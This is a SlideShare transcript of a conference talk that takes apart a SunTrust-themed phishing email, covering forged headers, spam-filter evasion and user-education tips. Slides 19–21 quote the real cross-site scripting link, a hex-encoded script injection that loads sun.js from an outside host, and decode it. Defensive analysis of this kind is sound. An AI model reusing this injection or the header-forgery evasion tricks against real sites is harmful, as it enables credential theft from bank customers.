Deconstructing A Phishing Scheme

791 views
754 views

Published on

Taking apart a JAVA script phishing email. Part of a presentation @ Secureworld expo

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
791
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Deconstructing A Phishing Scheme

  1. 1. Deconstructing A Phishing Scheme<br />Christopher Duffy, CISSP<br />
  2. 2. Agenda<br />Definition<br />Examples<br />Breakdown<br /> Follow Through<br />Statistics<br />Sites<br />
  3. 3. Defined<br />&quot;phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“<br /> -Wikipedia<br />
  4. 4.
  5. 5.
  6. 6. Catching a Phish<br />Complete Attack <br />1st effort to use clients as relay<br />Cross- Site Scripting Attack<br />email was not sent from the bank.<br />e web page it linked to contained extra characters in the URL address line - added on to the bank’s legitimate web address<br />page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page. <br />
  7. 7. Email Breakdown<br />Header Info<br />Incorrect Return Address<br />Return-Path: billing@suntrust.com <br />The return address is generated from the From: address and applied by the final SMTP server to handle the message. <br />Most scams forge the From: address. <br />This can be the only obfuscation a phisher employs; <br />forging From: headers is a trivial task, and is often a feature of normal client mail user agents. <br />
  8. 8. True Received: Header<br />Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) <br />Received: headers are written in reverse; in this case, 82.67.84.75 is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy <br />Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher<br />
  9. 9. Forged Received: Header <br />Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263)<br />This Received: line is forged. Some anti-spam software will trust the Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique. <br />Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “billing@suntrust.com” string in the fake server name; normal server names cannot have @-signs in their name. <br />The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam. <br />
  10. 10. Incorrect Time Stamp<br />Tue, 12 Nov 2008 07:12:03 -0100 <br />Timestamp Most LikelyFrom a Comprimised PC<br />(Out of SyncClock)<br />
  11. 11. Forged From: Name and Address<br />From: Suntrust Billing Departmentbilling@suntrust.com<br />the forged From: field is reflected in the Return-Path field<br />Most Likely a True email within Suntrust<br />Impersonal To: Name, if Any<br />To: Valued Suntrust Customer ,or<br />To:emailname@isp.com<br />No Salutation<br />
  12. 12. Threats<br />Account Compromised<br />Suspension<br />Upgrades in the Name of Security<br />Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.Proceed to customer service department&gt;&gt;<br />
  13. 13. No RTF<br />HTML-only message<br />Content-Type: text/html;<br />Delivered in HTML only, no RTF, or plain text.<br />Mail User Agent (MUA) Compatibility<br />
  14. 14. What???<br />Spurious Random Words<br />Content-Description: lonesome hysteria ulterior<br />Randomizer to avoid Bayesian Spam Filters<br />
  15. 15. Hijacked<br /><ul><li>Use of Trusted Logo’s & Images
  16. 16. Linked Directly to Site
  17. 17. Sense of Legitimacy</li></li></ul><li>ESL<br />Phishing activity outside US= Non Native<br />Origination of Phishing & Spam<br />Countries Hosting Phishing Sites Q1 2008<br />Russia 11.66<br />China 10.3<br />Germany 5.64<br />Romania 5.09 <br />
  18. 18. XSS<br />Cross Site Scripting Attacks<br />Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.<br />
  19. 19. XSS Deconstruction<br />&lt;a title=3D&quot;http://suntrust.com/&quot; target=3D&quot;_blank&quot; herf=3D&quot;http://www.sun=<br />trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45=<br />wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E&quot;&gt;click here&lt;/a&gt; to confirm you=r bank account records. &lt;br&gt;<br />SCREEN TIP TARGET OBSFUCATION<br />&lt;a title=3D&quot;http://suntrust.com/&quot; target=3D&quot;_blank“<br />Mouse Over to distract from real target link<br />
  20. 20. XSS Payload<br />Link to True Site<br />herf=3D&quot;http://www.sun=<br />trust.com/onlinestatements/index.asp?AccountVerify=3Ddf4g653432fvfdsGFSg45=<br />Link target is Suntrust, following is XSS Payload (HEX)<br />wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E&quot;&gt;click here&lt;/a&gt;<br />
  21. 21. HEX DeCoded<br />Hex-encoded HTTP parameters string. Decoded, it reads &quot;&gt;&lt;SCRIPTlanguage=javascriptsrc=&quot;http://218.103.23.138:8081/sun/sun.js&quot;&lt;/SCRIPT&gt;<br />Link Executes sun.js<br />218.103.23.138 Resolves to ISP in Hong Kong <br />
  22. 22. Top Phishing<br />Keyloggers & Maclious Code, up 93% from ’07<br />ISP’s<br />IRS<br />
  23. 23. Mitigation Through Education<br />Don’t click to Follow<br />Don’t trust Links<br />No Personal Information via email<br />Check out the URL<br />Let your Fingers Do the Walking <br />Type it In !<br />
  24. 24. SecurityCartoon.com<br />
  25. 25. More Information<br />Internet Crime Center<br />www.ic3.gov<br />Identity Theft: What to do if It Happens to You<br />http://www.privacyrights.org/fs/fs17a.htm<br />Federal Trade Commission phishing information<br />http://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm<br />Video tutorial on phishing:<br />http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php<br />Microsoft Phishing Information Website<br />http://www.microsoft.com/protect/yourself/phishing/identify.mspx<br />
  26. 26. Anti-Phishing Non Profit Sites<br />www.antiphishing.org<br />www.apwg.com<br />www.bestsecuritytips.com<br />www.cyberstreet.org<br />Carnigie Mellon University Game<br />http://cups.cs.cmu.edu/antiphishing_phil/new/index.html<br />

×